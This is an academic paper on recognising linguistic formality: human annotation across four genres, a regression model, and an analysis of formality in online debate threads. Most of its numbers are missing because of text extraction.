formality has long been of interest to linguists and sociolinguists, who have observed that it subsumes a range of dimensions of style in- cluding serious-trivial, polite-casual, and level of shared knowledge (irvine, ; brown and fraser, ). the formal-informal dimension has even been called the “most important di- mension of variation between styles” (heylighen and dewaele, ). a speaker’s level of formal- ity can reveal information about their familiar- ity with a person, opinions of a topic, and goals for an interaction (hovy, ; endrass et al., ). as a result, the ability to recognize for- mality is an integral part of dialogue systems (mairesse, ; mairesse and walker, ; battaglino and bickmore, ), sociolinguistic analyses (danescu-niculescu-mizil et al., ; justo et al., ; krishnan and eisenstein, ), human-computer interaction (johnson et al., ; khosmood and walker, ), summa- rization (sidhaye and cheung, ), and au- tomatic writing assessment (felice and deane, ). formality can also indicate context- independent, universal statements (heylighen and dewaele, ), making formality detection relevant for tasks such as knowledge base popu- lation (suh et al., ; reiter and frank, ) and textual entailment (dagan et al., ). this paper investigates formality in online written communication. the contributions are as follows: ) we provide an analysis of humans’ subjective perceptions of formality in four dif- ferent genres. we highlight areas of high and low agreement and extract patterns that consis- transactions of the association for computational linguistics, vol. , pp. – , . action editor: janyce wiebe and kristina toutanova. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. tently differentiate formal from informal text. ) we develop a state-of-the-art statistical model for predicting formality at the sentence level, evaluate the model’s performance against hu- man judgments, and compare differences in the effectiveness of features across genres. ) we apply our model to analyze language use in on- line debate forums. our results provide new ev- idence in support of theories of linguistic coordi- nation, underlining the importance of formality for language generation systems. ) we release our new dataset of , sentences annotated for formality level. related work there is no generally agreed upon definition as to what constitutes formal language. some de- fine formality in terms of situational factors, such as social distance and shared knowledge (sigley, ; hovy, ; lahiri et al., ). other recent work adopts a less abstract defi- nition which is similar to the notion of “noisy text”– e.g. use of slang and poor grammar (mosquera and moreda, a; peterson et al., ). as a result, many rules have been ex- plored for recognizing and generating informal language. some of these rules are abstract, such as the level of implicature (heylighen and de- waele, ; lahiri, ) or the degree of sub- jectivity (mosquera and moreda, a), while others are much more concrete, such as the num- ber of adjectives (fang and cao, ) or use of contractions (abu sheikha and inkpen, ). much prior work on detecting formality has focused on the lexical level (brooke et al., ; brooke and hirst, ; pavlick and nenkova, ). for larger units of text, perhaps the best-known method for measuring formality is the f-score (heylighen and dewaele, ), which is based on relative part-of-speech fre- quencies. 
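as a point of reference, that f-score is typically computed from the relative frequencies of "formal" (nouns, adjectives, prepositions, articles) versus "deictic" (pronouns, verbs, adverbs, interjections) part-of-speech categories. the sketch below assumes the commonly cited form of heylighen and dewaele's formula, with frequencies expressed as percentages of all tagged words; the tag labels are illustrative.

```python
# a minimal sketch (assuming the commonly cited form of the F-score) computed
# from part-of-speech counts; higher values indicate more formal text.
def f_score(pos_counts):
    total = sum(pos_counts.values())
    pct = {tag: 100.0 * c / total for tag, c in pos_counts.items()}
    formal = ["noun", "adjective", "preposition", "article"]
    deictic = ["pronoun", "verb", "adverb", "interjection"]
    return (sum(pct.get(t, 0.0) for t in formal)
            - sum(pct.get(t, 0.0) for t in deictic) + 100.0) / 2.0

# toy example: a fragment heavy in nouns and prepositions scores higher
print(f_score({"noun": 4, "preposition": 2, "article": 2, "verb": 1, "pronoun": 1}))
```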
f-score and its more recent variants (li et al., ) provide a coarse measure of for- mality, but are designed to work at the genre- level, making them less reliable for shorter units of text such as sentences (lahiri, ). exist- we use special font to denote heylighen and de- waele’s f-score to avoid confusion with f measure. ing statistical approaches to detecting formal- ity (abu sheikha and inkpen, ; peterson et al., ; mosquera and moreda, b) have treated the problem as a binary classification task and relied heavily on word lists to differen- tiate the two classes. linguistics literature sup- ports treating formality as a continuum (irvine, ; heylighen and dewaele, ), as has been done in studies of other pragmatic dimensions such as politeness (danescu-niculescu-mizil et al., ) and emotiveness (walker et al., ). lahiri et al. ( ) provided a preliminary in- vestigation of annotating formality on an ordi- nal scale and released a dataset of sentence-level formality annotations (lahiri, ), but did not use their data in any computational tasks. this paper extends prior work by (i) introducing a statistical regression model of formality which is based on an empirical analysis of human per- ceptions rather than on heuristics and (ii) by applying that model to a linguistic analysis of online discussions. human perceptions of formality before we can automatically recognize formal- ity, we need an understanding of what it means for language to be formal or informal. as we discussed in section , a number of theories ex- ist with no clear consensus. in this work, we do not attempt to develop a concrete definition of formality, but instead take a bottom-up ap- proach in which we assume that each individual has their own definition of formality. this ap- proach of using unguided human judgments has been suggested by sigley ( ) as one of the most reliable ways to get a gold-standard mea- sure of formality, and has been applied in prior computational linguistics studies of pragmatics (danescu-niculescu-mizil et al., ; lahiri, ). we aim to answer: do humans’ individual intuitions collectively provide a coherent notion of formality (§ . )? and, if so, which linguistic factors contribute to this notion (§ . )? . data and annotation since formality varies substantially across gen- res (li et al., ), we look at text from four different genres: news, blogs, emails, and com- (a) answers (µ=- . ,σ= . ) (b) blogs (µ= . ,σ= . ) (c) emails (µ= . ,σ= . ) (d) news (µ= . ,σ= . ) figure : distribution of sentence-level formality scores by genre. answers . that is in addition to any customs duties that may be assessed. answers - . (lol) jus kidding...the answer to your question is gas prices!!! news . baghdad is a city of surprising topiary sculptures: leafy ficus trees are carved in geometric spirals, balls, arches and squares, as if to impose order on a chaotic sprawl. news - . he bought and bought and never stopped. table : examples of formal (positive) and informal (negative) sentences in different genres. scores are taken as the mean of human judgments on a scale from - to . munity question answering forums (henceforth “answers”). lahiri ( ) released a corpus of sentence-level formality annotations, which contains , news and , blog sentences. in addition we take a random sample of , sentences from professional emails and , sentences from yahoo answers. we follow the protocol used in lahiri ( ) in order to gather judgments on amazon mechanical turk for the email and answers data. 
specifically, we use a -point likert scale, with labels from - (very informal) to (very formal). so as not to bias the annotators with our own no- tions of formality, we provide only a brief de- scription of formal language and encourage an- notators to follow their instincts when making their judgments. we use the mean of anno- tators’ scores as the overall formality score for each sentence. our newly collected annotations have been made public. for more information on the annotation, please refer to the supple- http://americanbridgepac.org/ jeb-bushs-gubernatorial-email-archive/ https://answers.yahoo.com/ in total, we had annotators, meaning each anno- tator labeled sentences on average. http://www.seas.upenn.edu/~nlp/resources/ formality-corpus.tgz mentary material to this paper. . analysis figure shows the distribution of mean formal- ity scores for the sentences in each of our genres. we see that news is the most formal of our do- mains and answers is the least. however, we can see anecdotally (table ) that the standard of what constitutes “informal” depends heavily on the genre: an informal sentence from news is much more formal than one from answers. we can also see clear differences in the variance of sentence formalities within each genre. in gen- eral, the interactive genres (email and answers) show a much flatter distribution than do the in- formational genres (news and blogs). inter-annotator agreement. we want to know whether individuals’ intuitions about for- mal language result in a coherent collective no- tion of formality. to quantify this, we measure whether annotators’ ordinal ratings of formality are well correlated and whether their categor- ical judgments are in agreement. for the for- mer, we use intraclass correlation (icc) which http://www.seas.upenn.edu/~epavlick/papers/ formality_supplement.pdf we report the average raters absolute agreement (icc k) using the psych package in r: https://cran. http://americanbridgepac.org/jeb-bushs-gubernatorial-email-archive/ http://americanbridgepac.org/jeb-bushs-gubernatorial-email-archive/ https://answers.yahoo.com/ http://www.seas.upenn.edu/~nlp/resources/formality-corpus.tgz http://www.seas.upenn.edu/~nlp/resources/formality-corpus.tgz http://www.seas.upenn.edu/~epavlick/papers/formality_supplement.pdf http://www.seas.upenn.edu/~epavlick/papers/formality_supplement.pdf https://cran.r-project.org/web/packages/psych/psych.pdf , , , , formal i would trust the social workers to make the appropriate case by case determination . - ,- ,- ,- ,- informal * what the world needs is only more of u & ur smile ! ! - ,- , ,- , mixed governor, if this was intentionally done, whoever did it has at least one vote to go to hell. - , , , , neutral you should try herbal peppermint tea. table : examples of sentences with different patterns of agreement. numbers show the list of scores assigned by the annotators. some sentences exhibit “mixed” formality, i.e. workers were split on whether to call the sentence generally informal or generally formal, while others are “neutral,” i.e. workers agreed the sentence was neither formal nor informal. is similar to pearson ρ but accounts for the fact that we have different groups of annotators for each sentence. for the latter, we use a quadratic weighted κ, which is a variation of cohen’s κ better fit for measuring agreement on ordinal scales. 
when using crowdsourced labels, com- puting reliable measures of κ is difficult since, for a given pair of annotators, the number of items for which both provided a label is likely small. we therefore simulate two annotators as follows. for each sentence, we randomly choose one annotator’s label to be the label of annota- tor and we take the mean label of the other annotators, rounded to the nearest integer, to be the label of annotator . we then compute κ for these two simulated annotators. we repeat this process , times, and report the median and % confidence interval (table ). n icc weighted κ answers , . ± . . ± . blog , . ± . . ± . email , . ± . . ± . news , . ± . . ± . table : annotator agreement measured by in- traclass correlation (icc) and categorical agree- ment (quadratic weighted κ) for each genre. agreement is reasonably strong across genres, with the exception of news, which appears to be the most difficult to judge. table sheds light on the types of sentences that receive high and low levels of agreement. at the extreme ends r-project.org/web/packages/psych/psych.pdf weighted κ penalizes large disagreements more than small disagreements. e.g. if annotator labels a sen- tence as − and annotator labels it − , this is penal- ized less than if annotator chooses − and annotator chooses + . of the spectrum where agreement is very high (mean scores near − and + ), we see sentences which are unambiguously formal or informal. however, in the middle (mean scores near ) we see both high and low agreement sentences. high agreement sentences tend to be “neutral,” i.e. annotators agree they are neither formal nor informal, while the low-agreement sentences tend to exhibit “mixed” formality, i.e. they con- tain both formal and informal sub-sentential ele- ments. we leave the topic of sub-sentential for- mality for future work, and instead allow our use of the mean score to conflate mixed formal- ity with neutral formality. this fits naturally into our treatment of formality as a continuous as opposed to a binary attribute. . factors affecting formality from the above analysis, we conclude that hu- mans have a reasonably coherent concept of for- mality. however, it is difficult to tease apart perceived formality differences that arise from the literal meaning of the text (e.g. whether the topic is serious or trivial) as opposed to arising from the style in which those ideas are expressed. to get a better understanding of the stylistic choices that differentiate formal from informal, we ran a second experiment in which we asked annotators to rewrite informal sentences in order to make them more formal. the goal is to isolate some of the linguistic factors that contribute to perceived formality while constraining the literal content of the text to be the same. we use this data for analysis in this section, as well as for evaluation in section . . for this task, we chose , sentences from the answers dataset, since it displays the widest variety of topics and styles. 
we attempt to choose sentences that are informal enough to permit formalizing, while covering all ranges of informality, from highly informal ("yep...love the pic lol") to only slightly informal ("as long as you feel good."). each sentence is shown in the context of the question and the full answer post in which it appeared. we collect one rewrite per sentence, and manually remove spammers. people make a large variety of edits, which cover the "noisy text" sense of formality (e.g. punctuation fixes, lexical normalization) as well as the more situational sense (e.g. inserting politeness, providing context). to characterize these different edit types, we manually reviewed a sample of rewrites and categorized the types of changes that were made.

table : frequency of types of edits/changes made in the rewriting experiment, and examples of each. note the categories are not mutually exclusive.
capitalization: "i do not like walmart." → "I do not like Walmart."
punctuation: "she's , but she seems more like a !!!!!" → "she is , but she seems more like !"
paraphrase: "lexus cars are awesome!" → "lexus brand cars are very nice."
delete fillers: "well it depends on that girl." → "it depends on the girl."
completion: "looks good on your record." → "it looks good on your record."
add context: "alive - i have seen that guy working at a - behnd the counter" → "my opinion is that osama bin laden is alive as i have encountered him working at a - store."
contractions: "i really don't like them." → "i really do not like them."
spelling: "i love dancing iwth my chick friends." → "i enjoy dancing with my girlfriends."
normalization: "juz try to put ur heart in to it." → "just try to put your heart into it."
slang/idioms: "that's a big no." → "i do not agree."
politeness: "uh, more details?" → "could you provide more details, please?"
split sentences: "[. . . ] not as tough... like high school" → "[. . . ] not as tough. it's like high school."
relativizers: "sorry i ' m not much help heh" → "sorry that i am not much help."
table gives the results of this analysis. over half of the rewrites involved changes to capitalization and punctuation. a quarter involved some sort of lexical or phrasal paraphrase (e.g. "awesome" → "very nice"). in % of cases, the rewritten sentence incorporated additional information that was apparent from the larger context, but not present in the original sentence. this accords with heylighen and dewaele ( )'s definition of "deep" formality, which says that formal language strives to be less context-dependent.

recognizing formality automatically

in the above section, we asked whether humans can recognize formality and what contributes to their perception of formal or informal. we now ask: how well can computers automatically distinguish formal from informal, and which linguistic triggers are important for doing so?

setup

we use the data described in section . for training, using the mean of the annotators' scores as the gold standard labels. we train a ridge regression model (http://scikit-learn.org/) with the model parameters tuned using cross validation on the training data. unless otherwise specified, we keep genres separate, so that models are trained only on data from the genre in which they are tested.

features. we explore different feature groups, described in table . to the best of our knowledge, of these feature groups (ngrams, word embeddings, parse tree productions, dependency tuples, and named entities) have not been explored in prior work on formality recognition. the remaining features (e.g. length, pos tags, case, punctuation, formal/informal lexicons, and subjectivity/emotiveness) largely subsume the features explored by previously published classifiers. we use stanford corenlp (http://nlp.stanford.edu/software/corenlp) for all of our linguistic processing, except for subjectivity features, for which we use textblob (https://textblob.readthedocs.org).

case: number of entirely-capitalized words; binary indicator for whether the sentence is lowercase; binary indicator for whether the first word is capitalized.
*dependency: one-hot features for the following dependency tuples, with lexical items backed off to pos tag: (gov, typ, dep), (gov, typ), (typ, dep), (gov, dep).
*entity: one-hot features for entity types (e.g. person, location) occurring in the sentence; average length, in characters, of person mentions.
lexical: number of contractions in the sentence, normalized by length; average word length; average word log-frequency according to the google ngram corpus; average formality score as computed by pavlick and nenkova ( ).
*ngram: one-hot features for the unigrams, bigrams, and trigrams appearing in the sentence.
*parse: depth of the constituency parse tree, normalized by sentence length; number of times each production rule appears in the sentence, normalized by sentence length, and not including productions with terminal symbols (i.e. lexical items).
pos: number of occurrences of each pos tag, normalized by the sentence length.
punctuation: number of '?', '...', and '!' in the sentence.
readability: length of the sentence, in words and characters; flesch-kincaid grade level score.
subjectivity: number of passive constructions; number of hedge words, according to a word list; number of st person pronouns; number of rd person pronouns; subjectivity according to the textblob sentiment module; binary indicator for whether the sentiment is positive or negative, according to the textblob sentiment module. all of these counts are normalized by the sentence length.
*word vec: average of word vectors using pre-trained word vec embeddings, skipping oov words.
table : summary of feature groups used in our model. to the best of our knowledge, those marked with (*) have not been previously studied in the context of detecting linguistic formality.

baselines. we measure the performance of our model using spearman ρ with human labels. we compare against the following baselines:
• sentence length: we measure length in characters, as this performed slightly better than length in words.
• flesch-kincaid grade level: f-k grade level (kincaid et al., ) is a function of word count and syllable count, designed to measure readability. we expect higher grade levels to correspond to more formal text.
• f-score: heylighen and dewaele ( )'s formality score (f-score) is a function of pos tag frequency which is designed to measure formality at the document and genre level. we expect higher f-score to correspond to more formal text.
• lm perplexity: we report the perplexity according to a -gram language model trained on the english gigaword with a vocabulary of k words. we hypothesize that sentences with lower perplexity (i.e. sentences which look more similar to edited news text) will tend to be more formal. we also explored using the ratio of the perplexity according to an "informal" language model over the perplexity according to a "formal" language model as a baseline, but the results of this baseline were not competitive, and so, for brevity, we do not include them here.
• formality lexicons: we compare against the average word formality score according to the formality lexicon released by brooke and hirst ( ). we compute this score in the same way as sidhaye and cheung ( ), who used it to measure the formality of tweets.
• ngram classifier: as our final baseline, we train a ridge regression model which uses only ngrams (unigrams, bigrams, and trigrams) as features.

comparison against previously published models. note that we are not able to make a meaningful comparison against any of the previously published statistical models for formality detection. to our knowledge, there are three relevant previous publications that produced statistical models for detecting formality: abu sheikha and inkpen ( ), peterson et al. ( ), and mosquera and moreda ( b). all three of these models performed a binary classification (as opposed to regression) and operated at the document (as opposed to sentence) level. we were able to closely reimplement the model of peterson et al. ( ), but we choose not to include the results here since their model was designed for binary email-level classification and thus relies on domain-specific features (e.g. casing in the subject line) that are not available in our real-valued, sentence-level datasets. the other models and the data/lexicons on which they relied are not readily available. for this reason, we do not compare directly against the previously published statistical models, but acknowledge that several of our features overlap with prior work (see section . and table ).

performance

table reports our results on -fold cross validation.
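before turning to the numbers, here is a minimal sketch (not the authors' released code) of the regression setup described in the setup section above: a ridge model with cross-validated regularization strength, evaluated with spearman correlation. the file name and column names are placeholders, and the ngram-only features stand in for the full feature set summarized in the table.

```python
import pandas as pd
from scipy.stats import spearmanr
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import RidgeCV
from sklearn.model_selection import cross_val_predict
from sklearn.pipeline import make_pipeline

# hypothetical file with one sentence per row and its mean annotator score
df = pd.read_csv("formality_answers.csv")   # columns: sentence, mean_formality

# ngram features only; the full model adds parse, pos, lexicon, and embedding features
model = make_pipeline(
    TfidfVectorizer(ngram_range=(1, 3), lowercase=False),
    RidgeCV(alphas=[0.1, 1.0, 10.0]),       # regularization strength tuned by cross validation
)

# k-fold cross-validated predictions, scored against the human judgments
preds = cross_val_predict(model, df["sentence"], df["mean_formality"], cv=5)
rho, _ = spearmanr(preds, df["mean_formality"])
print(f"spearman rho vs. human judgments: {rho:.2f}")
```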
using our full suite of features, we are able to achieve significant performance gains in all genres, improving by as much as points over our strongest baseline (the ngram model).

table : spearman ρ with human judgments for our model and several baselines (lm perplexity, f-score, length, f-k grade level, the brooke and hirst lexicon, the ngram model, and our full classifier), reported separately for the answers, blogs, email, and news genres.

note that, while the basic lm perplexity correlates very weakly with formality overall, the email genre actually exhibits a trend opposite of that which we expected: in email, sentences which look less like gigaword text (higher perplexity) tend to be more formal. on inspection, we see that many of the sentences which have low perplexity but which humans label as informal include sentences containing names and greeting/signature lines, as well as sentences which are entirely capitalized (capitalization is not considered by the lm).

contributions of feature groups. in order to gain better insight into how formality differs across genres, we look more closely at the performance of each feature group in isolation. table shows the performance of each feature group relative to the performance of the full classifier, for each genre. a few interesting results stand out. ngram and word embedding features perform well across the board, achieving over % of the performance of the full classifier in all cases. casing and punctuation features are significantly more important in the answers domain than in the other domains. constituency parse features and entity features carry notably more signal in the blog and news domains than in the email and answers domains.

table : relative performance of each feature group (ngram, word vec, parse, readability, dependency, lexical, case, pos, punctuation, subjectivity, entity) across genres. numbers reflect the performance (spearman ρ) of the classifier when using only the specified feature group, relative to the performance when using all feature groups.

table : drop in performance (spearman ρ × ) when the model is trained on sentences from one domain (row) and tested on sentences from another (column). changes are relative to the performance when trained only on sentences from the test domain (represented by zeros along the diagonal). all models were trained on an equal amount of data.

observing these differences between data sets raises the question: how well does knowledge of formality transfer across domains? to answer this, we measure classifier performance when trained in one domain and tested in another (table ). in our experiments, the model trained
we as- sume that workers’ rewrites indeed resulted in more formal sentences, and we frame the task as a pairwise classification in which the goal is to determine which of the two sentences (the original or the rewrite) is more formal. a ran- dom baseline achieves % accuracy. if we use the f-k readability measure, and assume the sentence with the higher grade level is the more formal of the two, we achieve only % accuracy. by running our supervised regression model and choosing the sentence with the higher predicted formality score as the more formal sentence, we achieve % accuracy, providing evidence that the model picks up subtle stylistic, not just topic, differences. formality in online discussions so far we have focused on building a model that can automatically distinguish between formal and informal sentences. we now use that model to analyze formality in practice, in the context of online discussion forums. we look to exist- ing theories of formality and of linguistic style matching to guide our analysis. in particular: • formality is higher when the amount of shared context between speakers is low (heylighen and dewaele, ). • formality is higher when speakers dislike one another (fielding and fraser, ). • speakers adapt their language in order to match the linguistic style of those with whom they are interacting (danescu- niculescu-mizil et al., ). ladywolf i was checking out this website for exodus international and i understand their mission is to provide an alternative for people who choose to be heterosexual. [...] i just find it hard to believe that they don’t somehow manipulate the situation in a less than fair way. joebrummer i started a thread earlier about just this! these groups are dangerous ladywolf, there is so much evidence to support that [...] ladywolf i thought so [...] i also see that they are running major newspaper ads...hmmm, how unbiased can a newspaper ad like this be? [...] i’m so glad i wasn’t raised a christian because from the tone of some of the replies, some members of this cult can be pretty mean huh? joebrummer yes, the are mean funny enough in the name of god. i was raised christian, catholic no less. i studied the bible, i was raised believing i would go to hell. that was tough. ladywolf i bet that was tough [...] i was raised jewish [...] it’s like so wierd because i’ve never had to deal with these types of people before. figure : example of a thread from our data. [...] indicates text has been left out to save space. with these hypotheses in mind, we explore how formality changes across topics and users (§ . ), how it relates to other pragmatic dimensions (§ . ), and how it changes over the lifetime of a thread (§ . ). understanding these patterns is an important first step toward building systems that can interact with people in a pragmatically competent way. . discussion data our data comes from the internet argument corpus (iac) dataset (walker et al., ), a corpus of threaded discussions from online de- bate forums. the dataset consists of k posts covering different topics, from economics to entertainment. we focus on threads in our anal- ysis, defined as chains of posts in which each is an explicit reply to the previous post (figure ). when the same user makes multiple consecutive posts in a thread (i.e. replies to their own post), we collapse these and treat them as a single post. in total, our data covers , threads. automatic classification. first, we assign a formality score to each post in our data us- ing the answers model in section . 
since this model is designed for sentence-level prediction, we define the score of a post to be the mean score of the sentences in that post. we acknowledge that this approximation is not ideal; to confirm that it will be sufficient for our analyses, we collect human judgments for , random posts using the same task setup as we used for the sentence-level judgments in section . . the correlation of our predicted score with the mean human score is . , which is within the range of inter-annotator agreement for labeling post formality ( . ≤ ρ ≤ . ). this range matches the agreement range observed for post-level politeness annotations (danescu-niculescu-mizil et al., ); note that agreement is more varied at the post level than at the sentence level, which makes sense given the "mixed formality" phenomenon: for long posts, a range of formality can be expressed, making the choice of a single score more subjective. the range of post formalities is also generally narrower than was the range of sentence formalities: while sentence-level scores range between - and , we find that % of post scores fall between - and . we take this as confirmation that the mean predicted sentence score is a decent approximation of human formality judgments for our purposes.

figure : formality distribution of posts in the most popular topics in the discussion data. the most popular topics (*) are used in our other analyses.

how do topic and user affect formality?

as formality is intertwined with many content-specific style dimensions such as "serious-trivial" (irvine, ), we expect the overall formality level to differ across topics. figure confirms this: many topics are clearly skewed toward being formal (e.g. economics) while others are skewed toward informal (e.g. fun). however, every topic includes both formal and informal posts: there are informal posts in economics ("oh my! a poor person....how could this have happened!") and formal posts in fun ("difficult to consider either one, or their variations, as a viable beverage when beer is available."). we see a similar pattern when we look at post formality levels by user: while most people speak generally formally or generally informally ( % of users have a mean formality level that is significantly different from at p < . ), nearly every user ( %) produces both formal and informal posts. this is true even when we look at users within one topic. these results are interesting: they suggest that while the formality of a post is related to the topic of discussion and to the individual speaker, these alone do not explain formality entirely. rather, as the aforementioned theories suggest, the same person discussing the same topic may become more or less formal in response to pragmatic factors.

how does formality relate to other pragmatic styles?

formality is often considered to be highly related with, and even to subsume, several other stylistic dimensions including politeness, impartiality, and intimacy. heylighen and dewaele ( ) suggest that formality is higher when shared social context is lower, and thus language should be more formal when directed at larger audiences or speaking about abstract concepts. fielding and fraser ( ) further suggest that informality is an important way of expressing closeness with someone, and thus formality should be higher when speakers dislike one another. to investigate these ideas further, we look at how formality correlates with human judgments of several other pragmatic dimensions.
we use the manual style annotations that are released for a subset of post-reply pairs ( k total) in the iac dataset (walker et al., ). these annotations include, for example, the extent to which the reply agrees/disagrees with the post and the extent to which the reply is insulting/respectful of the post. each of these dimensions has been rated by human annotators on a likert scale, similar to our own formality annotations. (we consider posts with scores > . as "formal" and those with scores < − . as "informal.") additionally, to investigate how formality correlates with politeness, we use the stanford politeness corpus (danescu-niculescu-mizil et al., ), which consists of k short posts from wikipedia discussion forums, again manually annotated on an ordinal scale.

table : formal posts exhibiting style properties often thought not to co-occur with formality.
emotional: the main cause of so much hate and disrespect is the phony war we're fighting and our tactics in violation of international law, our attitude of superiority in the world, and our bullying of others.
impolite: as a former administrator, and therefore a veteran editor who knows how wikipedia really works, i am actually surprised you would even ask such a question with such an obvious answer.
insulting: and here ladies and gentlemen we have the evidence of why i am justified in calling the likes of 'stormboy' an idiot.
sarcastic: thank you for bringing to my attention that atoms, neutrons and protons are merely scientific assumptions. now as i gaze at the night sky with all its bits and pieces spinning around each other i can sleep happily knowing that our solar system is not part of a housebrick afterall.

our results are generally consistent with what theories suggest. we find that posts which are targeted toward more general audiences (as opposed to specific people) and which make fact-based (as opposed to emotion-based) arguments are generally more formal (ρ = . and . , respectively), and that formality is significantly positively correlated with politeness (ρ = . ). we find significant negative correlations between formality and the extent to which the post is seen as sarcastic (ρ = − . ) or insulting (ρ = − . ). interestingly, we do not find a significant correlation between formality and the degree of expressed agreement/disagreement. while the directions of these relationships match prior theories and our intuitions, the strength of the correlation in many cases is weaker than we expected to see. table provides examples of some of the less intuitive co-occurrences of style, e.g. impolite but formal posts. these examples illustrate the complexity of the notion of formality, and how formal language can be used to give the impression of social distance while still allowing the speaker's emotions and personality to be very apparent.

how does formality change throughout a discussion?

prior work has revealed that speakers often adapt their language to match the language of those with whom they are interacting (danescu-niculescu-mizil et al., ). we therefore investigate how formality changes over the lifetime of a thread. do discussions become more or less formal over time? do speakers' levels of formality interact with one another? for these analyses, we focus on threads from to posts in length. because threads can branch, multiple threads might share a prefix sequence of posts.
to avoid double counting, we group together threads which stem from the same post and randomly chose one thread from each such group, throwing away the rest.

following the theory that formality is determined by the level of shared context, heylighen and dewaele ( ) hypothesize that formality should be highest at the beginning of a conversation, when no context has been established. we observe that, in fact, the first posts have significantly higher formality levels on average than do the remaining posts in the thread (figure ).

figure : on average, first posts are significantly more formal than later posts. left: mean formality of posts by position in thread. right: some examples where formal initial posts are followed by less formal replies. (note: forums.com replaces expletives with #s.)
initial: i wish to have a formal debate in the debate tournaments section on global warming. i propose the subject title of "global warming is both occuring and has been shown to be at least in part caused by human activity" i will take the afirmative position. anyone want to argue the opposite?
reply: global warming is a controversy. personally i am like hundred of maybe thousands if not millions of people that think it is liberal ###. the hole in the ozone layer is false, and i am sure this is too.
initial: the us military says that saddam hussein's briefcase contained transcripts of meetings with terrorists, contact information for those terrorists, and information on financial transactions that he carried out. [...] i wonder what else was in the briefcase. [...]
reply: transcripts? strange. i would be curious too.

once a context is established and a discussion begins, the theory of linguistic style matching suggests that people change their language to match that of others in the conversation (niederhoffer and pennebaker, ; danescu-niculescu-mizil et al., ). is this phenomenon true of formality? does a person's level of formality reflect the formality of those with whom they are speaking? figure shows an example thread in which the speakers together move toward a more informal tone as the conversation becomes more personal. to see if this kind of formality matching is the case in general, we use a linear mixed effects model (we use the mixed effects model with random intercepts provided by the statsmodels python package: http://statsmodels.sourceforge.net/devel/mixed_linear.html). briefly, a mixed effects model is a regression analysis that allows us to measure the influence of various "fixed effects" (e.g. the formality of the prior post) on a post's formality, while controlling for the "random effects" which prevent us from treating every post as an independent observation. in our case, we treat the topic and the author as random effects, i.e. we acknowledge that the formality levels of posts in the same topic by the same author are not independent, and we want to control for this when measuring the effects of other variables. we include fixed effects in our model of a post's formality: the formality of the previous post, the number of prior posts in the thread (position), the number of prior posts by this author in the thread (veteran level), the length of the entire thread, the total number of participants in the entire thread, and the lengths of the current and prior posts. we also include the pairwise interactions between these fixed effects. we include the topic and author as random effects.
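a minimal sketch of how such a model can be specified with the statsmodels package mentioned above; the dataframe and column names are placeholders, the response is synthetic so the example runs end to end, and, as a simplification, only the author is used as the grouping (random) effect rather than the full topic-and-author structure described above.

```python
import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

rng = np.random.default_rng(0)
n = 400

# hypothetical per-post data: each row is one (non-initial) post in a thread
posts = pd.DataFrame({
    "prev_formality": rng.normal(0, 1, n),            # formality of the post replied to
    "position":       rng.integers(2, 11, n),          # index of the post within its thread
    "veteran_level":  rng.integers(0, 5, n),            # prior posts by this author in the thread
    "thread_length":  rng.integers(5, 16, n),
    "author":         rng.choice([f"user{i}" for i in range(40)], n),
})
# synthetic response, only so the sketch is runnable
posts["formality"] = (0.3 * posts["prev_formality"]
                      - 0.05 * posts["veteran_level"]
                      + rng.normal(0, 0.5, n))

# fixed effects (including the prev_formality x position interaction) with a
# random intercept per author; the paper additionally treats topic as a random effect
model = smf.mixedlm(
    "formality ~ prev_formality * position + veteran_level + thread_length",
    data=posts,
    groups=posts["author"],
)
result = model.fit()
print(result.summary())
```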
for these analyses, we omit the first post in every thread, as prior analysis suggests that the function of the first post, and its formality, is markedly different from that of later posts. table gives the most significant results from our regression. we observe several interesting significant effects, such as a negative relationship between the number of times an author has posted in the thread and their formality level: i.e. people are more informal the more they post. however, the single best predictor of the formality of a post is the formality of the post to which it is replying.

table : estimated coefficients of variables strongly related to the formality of a post (previous score, veteran level, thread length, number of participants, position, and the previous score × position interaction; the veteran level and number of participants coefficients are negative), controlling for topic- and author-specific random effects. all effects are significant at p < . . × signifies an interaction between variables.

the estimated effect size is . , meaning that, all else being equal, we expect an increase of in the prior post's formality to correspond to an increase of . in the formality of the current post. this suggests that a person's formality does depend on the formality of others in the conversation. perhaps more interestingly, we see a significant positive effect of the interaction between previous score and position. that is, the effect of prior post formality on current post formality becomes stronger later in a thread compared to at the beginning of a thread. figure shows how the estimated coefficient for prior post formality on current post formality changes when we look only at posts at a particular index in a thread (e.g. only second posts, only tenth posts). we can see that the coefficient is more than twice as large for the tenth post of a thread than it is for the second post in that thread. one could imagine several explanations for this: i.e.
users with similar formality levels may engage in longer discussions, or users who engage in longer discussions may tend to adapt better to one another as the discussion progresses. we leave further investigation for future work.

figure : effect size of the prior post's formality on the current post's formality for posts at different positions in a thread (x-axis: position of post in thread; y-axis: estimated coefficient for the prior post's formality). effect size can be interpreted as the expected increase in a post's formality corresponding to an increase of in the prior post's formality, all else being equal.

conclusion

language contains more than its literal content: stylistic variation accounts for a large part of the meaning that is communicated. formality is one of the most basic dimensions of stylistic variation in language, and the ability to recognize and respond to differences in formality is a necessary part of full language understanding. this paper has provided an analysis of formality in written communication.
we presented a study of human perceptions of formality across multiple genres, and used our findings to build a statistical model which approximates human perceptions of for- mality with high accuracy. this model enabled us to investigate trends in formality in online de- bate forums, revealing new evidence in support of existing theories about formality and about linguistic coordination. these findings provide important steps toward building pragmatically competent automated systems. acknowledgements. we would like to thank martin chodorow for valuable discussion and in- put, and marilyn walker, shereen oraby, and shibamouli lahiri for sharing and facilitating the use of their resources. we would also like to thank amanda stent, dragomir radev, chris callison-burch, and the anonymous reviewers for their thoughtful suggestions. references fadi abu sheikha and diana inkpen. . auto- matic classification of documents by formality. in interntional conference on natural language pro- cessing and knowledge engineering (nlp-ke), pages – . ieee. fadi abu sheikha and diana inkpen. . gen- eration of formal and informal sentences. in pro- ceedings of the th european workshop on natu- ral language generation, pages – , nancy, france, september. association for computa- tional linguistics. cristina battaglino and timothy bickmore. . increasing the engagement of conversational agents through co-constructed storytelling. eighth workshop on intelligent narrative technologies. julian brooke and graeme hirst. . supervised ranking of co-occurrence profiles for acquisition of continuous lexical attributes. in proceedings of the th international conference on computa- tional linguistics. julian brooke, tong wang, and graeme hirst. . automatic acquisition of lexical formality. in col- ing : posters, pages – , beijing, china, august. coling organizing committee. penelope brown and colin fraser. . speech as a marker of situation. in social markers in speech, pages – . cambridge university press. ido dagan, oren glickman, and bernardo 